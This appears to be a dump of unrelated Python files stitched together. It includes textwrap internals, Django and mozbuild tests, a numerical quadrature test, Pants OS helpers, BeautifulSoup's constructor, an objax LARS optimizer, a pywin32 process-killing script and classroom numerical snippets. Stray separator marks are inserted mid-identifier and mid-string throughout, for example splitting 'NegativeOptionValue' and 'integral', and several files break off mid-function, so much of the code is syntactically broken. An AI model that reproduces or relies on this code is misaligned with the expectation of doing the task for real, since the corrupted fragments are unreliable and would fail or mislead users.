the maximum width of wrapped lines (unless break_long_words
is false)
initial_indent (default: "")
string that will be prepended to the first line of wrapped
output. Counts towards the line's width.
subsequent_indent (default: "")
string that will be prepended to all lines save the first
of wrapped output; also counts towards each line's width.
expand_tabs (default: true)
Expand tabs in input text to spaces before further processing.
Each tab will become 1 .. 8 spaces, depending on its position in
its line. If false, each tab is treated as a single character.
replace_whitespace (default: true)
Replace all whitespace characters in the input text by spaces
after tab expansion. Note that if expand_tabs is false and
replace_whitespace is true, every tab will be converted to a
single space!
fix_sentence_endings (default: false)
Ensure that sentence-ending punctuation is always followed
by two spaces. Off by default because the algorithm is
(unavoidably) imperfect.
break_long_words (default: true)
Break words longer than 'width'. If false, those words will not
be broken, and some lines might be longer than 'width'.
"""
whitespace_trans = string.maketrans(_whitespace, ' ' * len(_whitespace))
unicode_whitespace_trans = {}
uspace = ord(u' ')
for x in map(ord, _whitespace):
unicode_whitespace_trans[x] = uspace
# This funky little regex is just the trick for splitting
# text up into word-wrappable chunks. E.g.
# "Hello there -- you goof-ball, use the -b option!"
# splits into
# Hello/ /there/ /--/ /you/ /goof-/ball,/ /use/ /the/ /-b/ /option!
# (after stripping out empty strings).
wordsep_re = re.compile(r'(\s+|' # any whitespace
r'-*\w{2,}-(?=\w{2,})|' # hyphenated words
r'(?<=[\w\!\"\'\&\.\,\?])-{2,}(?=\w))') # em-dash
# XXX will there be a locale-or-charset-aware version of
# string.lowercase in 2.3?
sentence_end_re = re.compile(r'[%s]' # lowercase letter
r'[\.\!\?]' # sentence-ending punct.
r'[\"\']?' # optional end-of-quote
% string.lowercase)
def __init__ (self,
width=70,
initial_indent="",
subsequent_indent="",
expand_tabs=True,
replace_whitespace=True,
fix_sentence_endings=False,
break_long_words=True):
self.width = width
self.initial_indent = initial_indent
self.subsequent_indent = subsequent_indent
self.expand_tabs = expand_tabs
self.replace_whitespace = replace_whitespace
self.fix_sentence_endings = fix_sentence_endings
self.break_long_words = break_long_words
# -- Private methods -----------------------------------------------
# (possibly useful for subclasses to override)
def _munge_whitespace(self, text):
"""_munge_whitespace(text : string) -> string
Munge whitespace in text: expand tabs and convert all other
whitespace characters to spaces. Eg. " foo\tbar\n\nbaz"
becomes " foo bar baz".
"""
if self.expand_tabs:
text = text.expandtabs()
if self.replace_whitespace:
if isinstance(text, str):
text = text.translate(self.whitespace_trans)
elif isinstance(text, unicode):
text = text.translate(self.unicode_whitespace_trans)
return text
def _split(self, text):
"""_split(text : string) -> [string]
Split the text to wrap into indivisible chunks. Chunks are
not quite the same as words; see wrap_chunks() for full
details. As an example, the text
Look, goof-ball -- use the -b option!
breaks into the following chunks:
'Look,', ' ', 'goof-', 'ball', ' ', '--', ' ',
'use', ' ', 'the', ' ', '-b', ' ', 'option!'
"""
chunks = self.wordsep_re.split(text)
chunks = filter(None, chunks)
return chunks
def _fix_sentence_endings(self, chunks):
"""_fix_sentence_endings(chunks : | [strin | g])
Correct for sentence endings buried in 'chunks'. Eg. when the
original text contains "... foo.\nBar ...", munge_whitespace()
and split() will convert that to [..., "foo.", " ", "Bar", ...]
which has one too few spaces; this method simply changes the one
space to two.
"""
i = 0
pat = self.sentence_end_re
while i < len(chunks)-1:
if chunks[i+1] == " " and pat.search(chunks[i]):
chunks[i+1] = " "
i += 2
else:
i += 1
def _handle_long_word(self, chunks, cur_line, cur_len, width):
"""_handle_long_word(chunks : [string],
cur_line : [string],
cur_len : int, width : int)
Handle a chunk of text (most likely a word, not whitespace) that
is too long to fit in any line.
"""
space_left = max(width - cur_len, 1)
# If we're allowed to break long words, then do so: put as much
# of the next chunk onto the current line as will fit.
if self.break_long_words:
cur_line.append(chunks[0][0:space_left])
chunks[0] = chunks[0][space_left:]
# Otherwise, we have to preserve the long word intact. Only add
# it to the current line if there's nothing already there --
# that minimizes how much we violate the width constraint.
elif not cur_line:
cur_line.append(chunks.pop(0))
# If we're not allowed to break long words, and there's already
# text on the current line, do nothing. Next time through the
# main loop of _wrap_chunks(), we'll wind up here again, but
# cur_len will be zero, so the next line will be entirely
# devoted to the long word that we can't handle right now.
def _wrap_chunks(self, chunks):
"""_wrap_chunks(chunks : [string]) -> [string]
Wrap a sequence of text chunks and return a list of lines of
length 'self.width' or less. (If 'break_long_words' is false,
some lines may be longer than this.) Chunks correspond roughly
to words and the whitespace between them: each chunk i |
uw-it-aca/myuw | myuw/test/dao/test_quicklinks.py | Python | apache-2.0 | 8,048 | 0 | # Copyright 2022 UW-IT, University of Washington
# SPDX-License-Identifier: Apache-2.0
from django.test import TransactionTestCase
from myuw.models import VisitedLinkNew, CustomLink, PopularLink, User
from myuw.test import get_request_with_user
from myuw.dao.user import get_user_model
from myuw.dao.affiliation import get_all_affiliations
from myuw.dao.quicklinks import get_quicklink_data, get_link_label,\
add_custom_link, delete_custom_link, edit_custom_link,\
add_hidden_link, delete_hidden_link, get_popular_link_by_id,\
get_recent_link_by_id
from myuw.test import get_request_with_user
class TestQuickLinkDAO(TransactionTestCase):
def test_recent_filtering(self):
def _get_recent(data):
recent = set()
for link in data['recent_links']:
recent.add(link['url'])
return recent
username = 'none'
req = get_request_with_user(username)
user = get_user_model(req)
u1 = 'http://example.com?q=1'
u2 = 'http://example.com?q=2'
v1 = VisitedLinkNew.objects.create(user=user, url=u1)
self.assertTrue(get_recent_link_by_id(req, v1.pk))
v2 = VisitedLinkNew.objects.create(user=user, url=u2)
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 2)
self.assertTrue(u1 in recent)
self.assertTrue(u2 in recent)
plink = PopularLink.objects.create(url=u2)
self.assertTrue(get_popular_link_by_id(plink.pk))
self.assertIsNotNone(plink.json_data())
self.assertIsNotNone(str(plink))
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 1)
self.assertTrue(u1 in recent)
CustomLink.objects.create(user=user, url=u1)
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 0)
for i in range(10):
VisitedLinkNew.objects.create(user=user,
url="http://example.com?q=%s" % i)
data = get_quicklink_data(req)
recent = _get_recent(data)
self.assertEquals(len(recent), 5)
def test_link_label_override(self):
req = get_request_with_user('none')
user = get_user_model(req)
data = {"user": user,
"url": "http://example.com?q=replaceit",
"label": "Original"}
l1 = VisitedLinkNew.objects.create(**data)
self.assertEquals(get_link_label(l1), "Row For Unit Tests")
l1 = VisitedLinkNew.objects.create(user=user,
url="http://example.com?q=whatever",
label="Original")
self.assertEquals(get_link_label(l1), "Original")
def test_hidden_link(self):
req = get_request_with_user('none')
url = "http://s.ss.edu"
link = add_hidden_link(req, url)
self.assertEquals(link.url, url)
# second time
link1 = add_hidden_link(req, url)
self.assertEquals(link.pk, link1.pk)
self.assertIsNotNone(delete_hidden_link(req, link.pk))
# second time
self.assertIsNone(delete_hidden_link(req, link.pk))
def test_add_custom_link(self):
username = 'none'
req = get_request_with_user(username)
link = add_custom_link(req, "http://s1.ss.edu")
self.assertIsNone(link.label)
url = "http://s.ss.edu"
link_label = "ss"
link1 = add_custom_link(req, url, link_label)
self.assertEquals(link1.url, url)
self.assertEquals(link1.label, link_label)
# second time
link2 = add_custom_link(req, url, link_label)
self.assertEquals(link2.pk, link1.pk)
def test_delete_custom_link(self):
username = 'none'
req = get_request_with_user(username)
url = "http://s.ss.edu"
link = add_custom_link(req, url)
self.assertIsNotNone(delete_custom_link(req, link.pk))
# second time
self.assertIsNone(delete_custom_link(req, link.pk))
def test_edit_custom_link(self):
username = 'none'
req = get_request_with_user(username)
url = "http://s.ss.edu"
link = add_custom_link(req, url)
url1 = "http://s1.ss.edu"
link1 = edit_custom_link(req, link.pk, url1)
self.assertEquals(link1.url, url1)
url2 = "http://s2.ss.edu"
label2 = "s2"
link2 = edit_cu | stom_link(req, link1.pk, url2, label2)
self.assertIsNotNone(link2)
self.assertEquals(link2.label, label2)
def test_get_quicklink_data(self):
dat | a = {
"affiliation": "student",
"url": "http://iss1.washington.edu/",
"label": "ISS1",
"campus": "seattle",
"pce": False,
"affiliation": "{intl_stud: True}",
}
plink = PopularLink.objects.create(**data)
username = "jinter"
req = get_request_with_user(username)
affiliations = get_all_affiliations(req)
user = get_user_model(req)
link_data = {
"user": user,
"url": "http://iss.washington.edu/",
"label": "ISS1",
"is_anonymous": False,
"is_student": affiliations.get('student', False),
"is_undegrad": affiliations.get('undergrad', False),
"is_grad_student": affiliations.get('grad', False),
"is_employee": affiliations.get('employee', False),
"is_faculty": affiliations.get('faculty', False),
"is_seattle": affiliations.get('seattle', False),
"is_tacoma": affiliations.get('tacoma', False),
"is_bothell": affiliations.get('bothell', False),
"is_pce": affiliations.get('pce', False),
"is_student_employee": affiliations.get('stud_employee',
False),
"is_intl_stud": affiliations.get('intl_stud', False)
}
l1 = VisitedLinkNew.objects.create(**link_data)
qls = get_quicklink_data(req)
self.assertEqual(qls['recent_links'][0]['label'], "ISS1")
self.assertEqual(qls['default_links'][0]['label'],
"International Student Services (ISS)")
def test_bot_quicklinks(self):
username = "botgrad"
req = get_request_with_user(username)
bot_qls = get_quicklink_data(req)
self.assertEqual(bot_qls['default_links'][0]['url'],
"http://www.uwb.edu/cie")
def test_tac_quicklinks(self):
username = "tacgrad"
req = get_request_with_user(username)
tac_qls = get_quicklink_data(req)
self.assertEqual(tac_qls['default_links'][0]['label'],
"International Student and Scholar Services (ISSS)")
def test_MUWM_4760(self):
req = get_request_with_user('bill')
data = get_quicklink_data(req)
self.assertTrue(data['instructor'])
self.assertTrue(data['sea_emp'])
self.assertFalse(data['student'])
req = get_request_with_user('javerage')
data = get_quicklink_data(req)
self.assertFalse(data['instructor'])
self.assertTrue(data['student'])
self.assertFalse(data['bot_student'])
self.assertFalse(data['tac_student'])
self.assertTrue(data['sea_student'])
self.assertTrue(data['sea_emp'])
self.assertFalse(data['bot_emp'])
self.assertFalse(data['tac_emp'])
req = get_request_with_user('jbothell')
data = get_quicklink_data(req)
self.assertTrue(data['student'])
self.assertTrue(data['bot_student'])
req = get_request_with_user('eight')
data = get_quicklink_data(req)
self.assertTrue(data['student'])
self.assertTrue(data['tac_student'])
self.assertTrue(data['instructor'])
self.assertTrue(data['sea_emp'])
|
escapewindow/signingscript | src/signingscript/vendored/mozbuild/mozbuild/test/configure/test_configure.py | Python | mpl-2.0 | 54,289 | 0.000368 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from __future__ import absolute_import, print_function, unicode_literals
from StringIO import StringIO
import os
import sys
import textwrap
import unittest
from mozunit import (
main,
MockedOpen,
)
from mozbuild.configure.options import (
InvalidOptionError,
NegativeOptionValue,
PositiveOptionValue,
)
from mozbuild.configure import (
ConfigureError,
ConfigureSandbox,
)
from mozbuild.util import exec_
import mozpack.path as mozpath
test_data_path = mozpath.abspath(mozpath.dirname(__file__))
test_data_path = mozpath.join(test_data_path, 'data')
class TestConfigure(unittest.TestCase):
def get_config(self, options=[], env={}, configure='moz.configure',
prog='/bin/configure'):
config = {}
out = StringIO()
sandbox = ConfigureSandbox(config, env, [prog] + options, out, out)
sandbox.run(mozpath.join(test_data_path, configure))
if '--help' in options:
return out.getvalue(), config
self.assertEquals('', out.getvalue())
return config
def moz_configure(self, source):
return MockedOpen({
os.path.join(test_data_path,
'moz.configure'): textwrap.dedent(source)
})
def test_defaults(self):
config = self.get_config()
self.maxDiff = None
self.assertEquals({
'CHOICES': NegativeOptionValue(),
'DEFAULTED': PositiveOptionValue(('not-simple',)),
'IS_GCC': NegativeOptionValue(),
'REMAINDER': (PositiveOptionValue(), NegativeOptionValue(),
NegativeOptionValue(), NegativeOptionValue()),
'SIMPLE': NegativeOptionValue(),
'VALUES': NegativeOptionValue(),
'VALUES2': NegativeOptionValue(),
'VALUES3': Negativ | eOptionValue(),
'WITH_ENV': NegativeOptionValue(),
}, config)
def test_help(self):
help, config = self.get_config(['--help'], prog='configure')
self.assertEquals({}, config)
self.maxDiff = None
self.assertEquals(
'Usage: configure [options]\n'
'\n'
'Options: [defaults in brackets after descriptions]\n'
' --help | print this message\n'
' --enable-simple Enable simple\n'
' --enable-with-env Enable with env\n'
' --enable-values Enable values\n'
' --without-thing Build without thing\n'
' --with-stuff Build with stuff\n'
' --option Option\n'
' --with-returned-default Returned default [not-simple]\n'
' --returned-choices Choices\n'
' --enable-imports-in-template\n'
' Imports in template\n'
' --enable-include Include\n'
' --with-imports Imports\n'
'\n'
'Environment variables:\n'
' CC C Compiler\n',
help
)
def test_unknown(self):
with self.assertRaises(InvalidOptionError):
self.get_config(['--unknown'])
def test_simple(self):
for config in (
self.get_config(),
self.get_config(['--disable-simple']),
# Last option wins.
self.get_config(['--enable-simple', '--disable-simple']),
):
self.assertNotIn('ENABLED_SIMPLE', config)
self.assertIn('SIMPLE', config)
self.assertEquals(NegativeOptionValue(), config['SIMPLE'])
for config in (
self.get_config(['--enable-simple']),
self.get_config(['--disable-simple', '--enable-simple']),
):
self.assertIn('ENABLED_SIMPLE', config)
self.assertIn('SIMPLE', config)
self.assertEquals(PositiveOptionValue(), config['SIMPLE'])
self.assertIs(config['SIMPLE'], config['ENABLED_SIMPLE'])
# --enable-simple doesn't take values.
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-simple=value'])
def test_with_env(self):
for config in (
self.get_config(),
self.get_config(['--disable-with-env']),
self.get_config(['--enable-with-env', '--disable-with-env']),
self.get_config(env={'MOZ_WITH_ENV': ''}),
# Options win over environment
self.get_config(['--disable-with-env'],
env={'MOZ_WITH_ENV': '1'}),
):
self.assertIn('WITH_ENV', config)
self.assertEquals(NegativeOptionValue(), config['WITH_ENV'])
for config in (
self.get_config(['--enable-with-env']),
self.get_config(['--disable-with-env', '--enable-with-env']),
self.get_config(env={'MOZ_WITH_ENV': '1'}),
self.get_config(['--enable-with-env'],
env={'MOZ_WITH_ENV': ''}),
):
self.assertIn('WITH_ENV', config)
self.assertEquals(PositiveOptionValue(), config['WITH_ENV'])
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-with-env=value'])
with self.assertRaises(InvalidOptionError):
self.get_config(env={'MOZ_WITH_ENV': 'value'})
def test_values(self, name='VALUES'):
for config in (
self.get_config(),
self.get_config(['--disable-values']),
self.get_config(['--enable-values', '--disable-values']),
):
self.assertIn(name, config)
self.assertEquals(NegativeOptionValue(), config[name])
for config in (
self.get_config(['--enable-values']),
self.get_config(['--disable-values', '--enable-values']),
):
self.assertIn(name, config)
self.assertEquals(PositiveOptionValue(), config[name])
config = self.get_config(['--enable-values=foo'])
self.assertIn(name, config)
self.assertEquals(PositiveOptionValue(('foo',)), config[name])
config = self.get_config(['--enable-values=foo,bar'])
self.assertIn(name, config)
self.assertTrue(config[name])
self.assertEquals(PositiveOptionValue(('foo', 'bar')), config[name])
def test_values2(self):
self.test_values('VALUES2')
def test_values3(self):
self.test_values('VALUES3')
def test_returned_default(self):
config = self.get_config(['--enable-simple'])
self.assertIn('DEFAULTED', config)
self.assertEquals(
PositiveOptionValue(('simple',)), config['DEFAULTED'])
config = self.get_config(['--disable-simple'])
self.assertIn('DEFAULTED', config)
self.assertEquals(
PositiveOptionValue(('not-simple',)), config['DEFAULTED'])
def test_returned_choices(self):
for val in ('a', 'b', 'c'):
config = self.get_config(
['--enable-values=alpha', '--returned-choices=%s' % val])
self.assertIn('CHOICES', config)
self.assertEquals(PositiveOptionValue((val,)), config['CHOICES'])
for val in ('0', '1', '2'):
config = self.get_config(
['--enable-values=numeric', '--returned-choices=%s' % val])
self.assertIn('CHOICES', config)
self.assertEquals(PositiveOptionValue((val,)), config['CHOICES'])
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-values=numeric',
'--returned-choices=a'])
with self.assertRaises(InvalidOptionError):
self.get_config(['--enable-values=alpha', '--returned-choices=0'])
def test_included(self):
config = self.get_config( |
gregvonkuster/icqsol | tests/testQuadratureCpp.py | Python | mit | 1,770 | 0.007345 | from __future__ import print_function
from ctypes import cdll, POINTER, byref, c_void_p, c_double
import numpy
import pkg_resources
from icqsol.bem.icqQuadrature import triangleQuadrature
import glob
import sys
PY_MAJOR_VERSION = sys.version_info[0]
# On some distributions the fuly qualified shared library name
# includes suffixes such as '.cpython-35m-darwin.so'
def getFullyQualifiedSharedLibraryName(libName):
return glob.glob(libName + '*')[0]
# Extract the shared library from the egg
if PY_MAJOR_VERSION < 3:
fullyQualifiedSharedLibraryName = pkg_resources.resource_filename('icqsol', 'icqLaplaceMatricesCpp.so')
else:
libName = pkg_resources.resource_filename('icqsol', 'icqLaplaceMatricesCpp')
fullyQualifiedSharedLibraryName = getFullyQualifiedSharedLibraryName(libName)
# Open the shared library
lib = cdll.LoadLibrary(fullyQualifiedSharedLibraryName)
# Opaque handle
handle = c_void_p(0)
# Constructor
lib.icqQuadratureInit(byref(handle))
# | Tests
def func(p):
pNorm = numpy.linalg.norm(p)
return 1.0/(-4*numpy.pi*pNorm)
maxOrder = lib.icqQuadratureGetMaxOrder(byref(handle))
pa = numpy.array([0., 0., 0.])
pb = numpy.array([1., 0., 0.])
pc = numpy.array([0., 1., 0.])
paPtr = pa.ctypes.data_as(POINTER(c_double))
pbPtr = pb.ctypes.data_as(POINTER(c_double))
pcPtr = pc.ctypes.data_as(POINTER(c_double))
lib.icqQuadratureEvaluate.restype = c_double
for order in range(1, maxOrder + 1):
integra | l = lib.icqQuadratureEvaluate(byref(handle), order, paPtr, pbPtr, pcPtr)
integral2 = triangleQuadrature(order=order, pa=pa, pb=pb, pc=pc, func=func)
print('order = ', order, ' integral = ', integral, ' integral2 = ', integral2)
assert(abs(integral - integral2) < 1.e-10)
# Destructor
lib.icqQuadratureDel(byref(handle))
|
clement-masson/IN104_simulateur | IN104_simulateur/boardState.py | Python | mit | 39 | 0 | f | rom .cpp.boardState import BoardState | |
benjyw/pants | src/python/pants/util/osutil.py | Python | apache-2.0 | 2,336 | 0.001712 | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, V | ersion 2.0 (see LICENSE).
import errno
import logging
import os
import posix
from functools import reduce
from typing import Optional, Set
logger = logging.getLogger(__name__)
OS_ALIASES = {
"darwin": {"macos", "darwin", "macosx", "mac os x", "mac"},
"linux": {"linux", "linux2"},
}
Pid = int
def get_os_name(uname_result: Optional[posix.uname_result] = None) -> str:
"""
:API: public
"""
if uname_result is None:
uname | _result = os.uname()
return uname_result[0].lower()
def normalize_os_name(os_name: str) -> str:
"""
:API: public
"""
if os_name not in OS_ALIASES:
for proper_name, aliases in OS_ALIASES.items():
if os_name in aliases:
return proper_name
logger.warning(
"Unknown operating system name: {bad}, known names are: {known}".format(
bad=os_name, known=", ".join(sorted(known_os_names()))
)
)
return os_name
def get_normalized_os_name() -> str:
return normalize_os_name(get_os_name())
def known_os_names() -> Set[str]:
return reduce(set.union, OS_ALIASES.values())
# From kill(2) on OSX 10.13:
# [EINVAL] Sig is not a valid, supported signal number.
#
# [EPERM] The sending process is not the super-user and its effective user id does not match the effective user-id of the receiving process. When signaling a process group, this error is returned if
# any members of the group could not be signaled.
#
# [ESRCH] No process or process group can be found corresponding to that specified by pid.
#
# [ESRCH] The process id was given as 0, but the sending process does not have a process group.
def safe_kill(pid: Pid, signum: int) -> None:
"""Kill a process with the specified signal, catching nonfatal errors."""
assert isinstance(pid, Pid)
assert isinstance(signum, int)
try:
os.kill(pid, signum)
except (IOError, OSError) as e:
if e.errno in [errno.ESRCH, errno.EPERM]:
pass
elif e.errno == errno.EINVAL:
raise ValueError(f"Invalid signal number {signum}: {e}", e)
else:
raise
|
heldergg/dre | lib/bs4/__init__.py | Python | gpl-3.0 | 12,881 | 0.001009 | """Beautiful Soup
Elixir and Tonic
"The Screen-Scraper's Friend"
http://www.crummy.com/software/BeautifulSoup/
Beautiful Soup uses a pluggable XML or HTML parser to parse a
(possibly invalid) document into a tree representation. Beautiful Soup
provides provides methods and Pythonic idioms that make it easy to
navigate, search, and modify the parse tree.
Beautiful Soup works with Python 2.6 and up. It works better if lxml
and/or html5lib is installed.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/bs4/doc/
"""
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "4.0.4"
__copyright__ = "Copyright (c) 2004-2012 Leonard Richardson"
__license__ = "MIT"
__all__ = ['BeautifulSoup']
import re
import warnings
from .builder import builder_registry
from .dammit import UnicodeDammit
from .element import (
CData,
Comment,
DEFAULT_OUTPUT_ENCODING,
Declaration,
Doctype,
NavigableString,
PageElement,
ProcessingInstruction,
ResultSet,
SoupStrainer,
Tag,
)
# The very first thing we do is give a useful error if someone is
# running this code under Python 3 without converting it.
syntax_error = u'You are trying to run the Python 2 version of Beautiful Soup under Python 3. This will not work. You need to convert the code, either by installing it (`python setup.py install`) or by running 2to3 (`2to3 -w bs4`).'
class BeautifulSoup(Tag):
"""
This class defines the basic interface called by the tree builders.
These methods will be called by the parser:
reset()
feed(markup)
The tree builder may call these methods from its feed() implementation:
handle_starttag(name, attrs) # See note about return value
handle_endtag(name)
handle_data(data) # Appends to the current data node
endData(containerClass=NavigableString) # Ends the current data node
No matter how complicated the underlying parser is, you should be
able to build a tree using 'start tag' events, 'end tag' events,
'data' events, and "done with data" events.
If you encounter an empty-element tag (aka a self-closing tag,
like HTML's <br> tag), call handle_starttag and then
handle_endtag.
"""
ROOT_TAG_NAME = u'[document]'
# If the end-user gives no indication which tree builder they
# want, look for one with these features.
DEFAULT_BUILDER_FEATURES = ['html', 'fast']
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = {9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", features=None, builder=None,
parse_only=None, from_encoding=None, **kwargs):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser."""
if 'convertEntities' in kwargs:
warnings.warn(
"BS4 does not respect the convertEntities argument to the "
"BeautifulSoup constructor. Entities are always converted "
"to Unicode characters.")
if 'markupMassage' in kwargs:
del kwargs['markupMassage']
warnings.warn(
"BS4 does not respect the markupMassage argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for any necessary markup massage.")
if 'smartQuotesTo' in kwargs:
del kwargs['smartQuotesTo']
warnings.warn(
"BS4 does not respect the smartQuotesTo argument to the "
"BeautifulSoup constructor. Smart quotes are always converted "
"to Unicode characters.")
if 'selfClosingTags' in kwargs:
del kwargs['selfClosingTags']
warnings.warn(
"BS4 does not respect the selfClosingTags argument to the "
"BeautifulSoup constructor. The tree builder is responsible "
"for understanding self-closing tags.")
if 'isHTML' in kwargs:
del kwargs['isHTML']
warnings.warn(
"BS4 does not respect the isHTML argument to the "
"BeautifulSoup constructor. You can pass in features='html' "
"or features='xml' to get a builder capable of handling "
"one or the other.")
def deprecated_argument(old_name, new_name):
if old_name in kwargs:
warnings.warn(
'The "%s" argument to the BeautifulSoup constructor '
'has been renamed to "%s."' % (old_name, new_name))
value = kwargs[old_name]
del kwargs[old_name]
return value
return None
parse_only = parse_only or deprecated_argument(
"parseOnlyThese", "parse_only")
from_encoding = from_encoding or deprecated_argument(
"fromEncoding", "from_encoding")
if len(kwargs) > 0:
arg = kwargs.keys().pop()
raise TypeError(
"__init__() got an unexpected keyword argument '%s'" % arg)
if builder is None:
if isinstance(features, basestring):
features = [features]
if features is None or len(features) == 0:
features = self.DEFAULT_BUILDER_FEATURES
builder_class = builder_registry.lookup(*features)
if builder_class is None:
raise Val | ueError(
"Couldn't find a tree builder with the features you "
"requested: %s. Do you need to install a parser library?"
% ",".join(features))
builder = builder_class()
self.builder = builder
self.is_xml = builder.is_xml
self.builder.soup = self
| self.parse_only = parse_only
self.reset()
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
(self.markup, self.original_encoding, self.declared_html_encoding,
self.contains_replacement_characters) = (
self.builder.prepare_markup(markup, from_encoding))
try:
self._feed()
except StopParsing:
pass
# Clear out the markup and remove the builder's circular
# reference to this object.
self.markup = None
self.builder.soup = None
def _feed(self):
# Convert the document to Unicode.
self.builder.reset()
self.builder.feed(self.markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def reset(self):
Tag.__init__(self, self, self.builder, self.ROOT_TAG_NAME)
self.hidden = 1
self.builder.reset()
self.currentData = []
self.currentTag = None
self.tagStack = []
self.pushTag(self)
def new_tag(self, name, namespace=None, nsprefix=None, **attrs):
"""Create a new tag associated with this soup."""
return Tag(None, self.builder, name, namespace, nsprefix, attrs)
def new_string(self, s):
"""Create a new NavigableString associated with this soup."""
navigable = NavigableString(s)
navigable.setup()
return navigable
def insert_before(self, successor):
raise ValueError("BeautifulSoup objects don't support insert_before().")
def insert_after(self, successor):
raise ValueError("BeautifulSoup objects don't support insert_after().")
def popTag(self):
tag = self.tagStack.pop()
#print "Pop", tag.name
if self.tagStack:
self.currentTag = self.tagStack[-1]
return self.currentTag
def pushTag(self, tag):
#print "Push", tag.name
|
google/objax | objax/optimizer/lars.py | Python | apache-2.0 | 2,914 | 0.002745 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or ag | reed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# lim | itations under the License.
__all__ = ['LARS']
from typing import List
import jax.numpy as jn
from objax.module import Module, ModuleList
from objax.typing import JaxArray
from objax.util import class_name
from objax.variable import TrainRef, StateVar, TrainVar, VarCollection
class LARS(Module):
"""Layerwise adaptive rate scaling (LARS) optimizer.
See https://arxiv.org/abs/1708.03888
"""
def __init__(self, vc: VarCollection,
momentum: float = 0.9,
weight_decay: float = 1e-4,
tc: float = 1e-3,
eps: float = 1e-5):
"""Constructor for LARS optimizer.
Args:
vc: collection of variables to optimize.
momentum: coefficient used for the moving average of the gradient.
weight_decay: weight decay coefficient.
tc: trust coefficient eta ( < 1) for trust ratio computation.
eps: epsilon used for trust ratio computation.
"""
self.momentum = momentum
self.weight_decay = weight_decay
self.tc = tc
self.eps = eps
self.train_vars = ModuleList(TrainRef(x) for x in vc.subset(TrainVar))
self.m = ModuleList(StateVar(jn.zeros_like(x.value)) for x in self.train_vars)
def __call__(self, lr: float, grads: List[JaxArray]):
"""Updates variables based on LARS algorithm.
Args:
lr: learning rate. The LARS paper suggests using lr = lr_0 * (1 -t/T)**2,
where t is the current epoch number and T the maximum number of epochs.
grads: the gradients to apply.
"""
assert len(grads) == len(self.train_vars), 'Expecting as many gradients as trainable variables'
for g, p, m in zip(grads, self.train_vars, self.m):
p_norm = jn.linalg.norm(p.value)
g_norm = jn.linalg.norm(g)
trust_ratio = self.tc * p_norm / (g_norm + self.weight_decay * p_norm + self.eps)
local_lr = lr * jn.maximum(jn.logical_or(p_norm == 0, g_norm == 0), trust_ratio)
m.value = self.momentum * m.value + local_lr * (g + self.weight_decay * p.value)
p.value -= m.value
def __repr__(self):
return f'{class_name(self)}(momentum={self.momentum}, weight_decay={self.weight_decay}, ' \
f'tc={self.tc}, eps={self.eps})'
|
JulienMcJay/eclock | windows/Python27/Lib/site-packages/pywin32-218-py2.7-win32.egg/scripts/killProcName.py | Python | gpl-2.0 | 1,766 | 0.026048 | # Kills a process by process name
#
# Uses the Performance Data Helper to locate the PID, then kills it.
# Will only kill the process if there is only one process of that name
# (eg, attempting to kill "Python.exe" will only work if there is only
# one Python.exe running. (Note that the current process does not
# count - ie, if Python.exe is hosting this script, you can still kill
# another Python.exe (as long as there is only one other Python.exe)
# Really just a demo for the win32pdh(util) module, which allows you
# to get all sorts | of information about a running process and many
# other aspects of your system.
import win32api, win32pdhutil, win32con, sys
def killProcName(procname):
# Change suggested by Dan Knierim, who found that this performed a
# "refresh", allowing us to kill processes created since this was run
# for the first time.
try:
win32pdhutil.GetPerformanceAttributes('Process','ID Process',procname)
except:
pass
pids = | win32pdhutil.FindPerformanceAttributesByName(procname)
# If _my_ pid in there, remove it!
try:
pids.remove(win32api.GetCurrentProcessId())
except ValueError:
pass
if len(pids)==0:
result = "Can't find %s" % procname
elif len(pids)>1:
result = "Found too many %s's - pids=`%s`" % (procname,pids)
else:
handle = win32api.OpenProcess(win32con.PROCESS_TERMINATE, 0,pids[0])
win32api.TerminateProcess(handle,0)
win32api.CloseHandle(handle)
result = ""
return result
if __name__ == '__main__':
if len(sys.argv)>1:
for procname in sys.argv[1:]:
result = killProcName(procname)
if result:
print result
print "Dumping all processes..."
win32pdhutil.ShowAllProcesses()
else:
print "Killed %s" % procname
else:
print "Usage: killProcName.py procname ..."
|
ilcn/NumericalAnalysis | a3.py | Python | gpl-2.0 | 659 | 0.069803 | def p5a():
xs = [-.75, -0.5,-0.25,0]
fxs = [-.0718125, -.02475, .3349375, 1.101]
getdd123(xs,fxs,3)
def getdd123(xs,fxs,n):
#derivatives
l1stdd = []
l2nddd = []
l3rddd = []
for i in range | (0,n):
l1stdd.append((fxs[i+1]-fxs[i])/(xs[i+1]-xs[i]))
for i in range(0,n-1):
l2nddd.append((l1stdd[i+1]-l1stdd[i])/(xs[i+2]-xs[i]))
for i in range(0,n-2):
l3rddd.append((l2nddd[i+1]-l2nddd[i])/(xs[i+3]-xs[i]))
#print [l1stdd,l2nddd,l3rddd]
return [l1stdd,l2nddd,l3rddd]
def p7a():
xs = [-.1, 0,.2,.3]
fxs = [5.3, 2, 3.19, 1]
